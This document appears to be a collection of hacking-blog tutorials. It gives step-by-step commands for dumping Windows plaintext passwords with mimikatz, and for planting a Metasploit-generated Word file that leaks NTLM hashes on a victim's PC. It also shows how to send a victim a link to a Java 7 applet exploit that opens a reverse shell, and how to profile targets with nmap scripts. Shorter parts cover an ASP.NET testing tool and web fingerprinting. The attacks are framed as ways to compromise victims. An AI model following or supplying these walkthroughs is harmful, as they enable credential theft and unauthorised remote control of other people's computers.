Get Clear Text Credentials of windows

Today we are going to use new tools which can be use to get windows password in plain text. It works on both 32 bit & 64 bit O.S.  We have already known  NTLM password cracking methods, but it`s time consuming , & sometimes we could not get password in plain text. But this tools is amazing , which works on method of Pass the pass.

In this tutorial we are going to use this tool in local computer , But in next we will use this tool to get passwords of Remote P.C.  using  metasploit.

(1)Download     tool  from here

(2)After Extracting open win32 or x64 depending upon your O.S.

(3)Run as Administration mimikatz.

(4)Now type privilege::debug  , this command check if mimikitz running with system privilege

(5)In order to get credential in plain text type this command sekurlsa::logonPaswords full

(6)You can see credential in plain text.

Next we will use metasploit to get credential of Remote P.C.

ASP.NET web-application Testing

Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.

You can Download source code from following website.

http://ethicalhackingaspnet.codeplex.com/releases/view/52623

Currently the following tests are available:

(1)Viewstate eavesdroping & information disclosure

(2)Session Fixation

(3)Oracle Padding

Web-application Fingerprinting

Methods of Web Application Finger Printing

Historically Identification of Open Source applications have been easier as the behavior pattern and all the source codes are publically open. In the early days web application identification was as simple as looking in the footer of the Page of text like “Powered by <XYZ>”. However as more and more Server admin became aware of this simple stuff so is the Pen Testers approach became more complex towards identification of web application running on remote machine.

HTML Data Inspection

This is the simplest method in which manual approach is to open the site on browser and look at its source code, similarly on automated manner your tool will connect to site, download the page and then will run some basic regular expression patterns which can give you the results in yes or no. Basically what we are looking for is unique pattern specific to web software. Examples of such patterns are

1) Wordpress
Meta Tag Folder Names

Folder Names in Link section

Ever green notice at the bottom

2) OWA
URL pattern
http://<site_name>/OWA/

3) Joomla
URL pattern: http://<site_name>/component/

Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

First Hack the Victim PC Using Metaspolit (click here)

msfconsole

use auxiliary/docx/word_unc_injector

msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (word_unc_injector)>exploit

Now we successfully generate the malicious docx File, it will stored on your local computer

/root/.msf4/local/msf.docx

Now use ‘upload ‘command to upload the msf.docx in victim pc using

Upload /root/.msf4/local/msf.docx.

Now use auxiliary/server/capture/smb

msf exploit (smb)>run

When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can try to connect to another victim use the same password

Hack Remote P.C. using latest java vulnerability

JAVA APPLET JMX REMOTE CODE EXECUTION:-

This vulnerability is exploited in February 2013.Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Any O.S. Which is running java 7 update 10 is exploitable. Just attacker require metasploit.

Open your terminal & type following code

msfconsole

use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp

msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)

msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_jmxbean_2)>exploit

Now an URL you should give to your victim http://192.168.1.7:8080/

Send link to victim. As soon as he clicked you got session. Type following command.

Sessions -l

sessions -i 1

Now you get victim `s shell.

Use NMAP as a Information gathering tool

Usually we use NMAP as a port scanner to find open port of web-server, But with help of this Tool we can also gather Information about victim using NMAP script. In this tutorial we use NMAP to gather information.

(1) Use NMAP to determine I.P. Address of victim:- NMAP include two scripts in his database.

nmap --script ip-geolocation-* host-name

As we can see that it show co-ordinate & location of our target.

(2)Use NMAP as Whois Tool:- Following Command is used to find whois information about victim

nmap --script whois host-name